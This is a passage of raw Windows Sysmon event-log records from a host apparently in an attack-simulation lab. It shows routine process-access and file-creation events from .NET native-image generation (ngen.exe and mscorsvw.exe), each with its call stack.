13:46:21.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.546{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.546{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DB01-00000000A301}3808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.515{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.500{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.500{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-DA01-00000000A301}2832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.328{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.312{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.312{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D901-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.218{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.218{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D801-00000000A301}4616C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.187{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.171{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.171{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D701-00000000A301}4336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.125{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.125{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.062{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.062{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-D501-00000000A301}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D401-00000000A301}1404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:22.984{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e5c-0\Microsoft.Transactions.Bridge.dll2021-01-18 13:46:22.984 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:22.140{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912E-6005-E501-00000000A301}3676C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 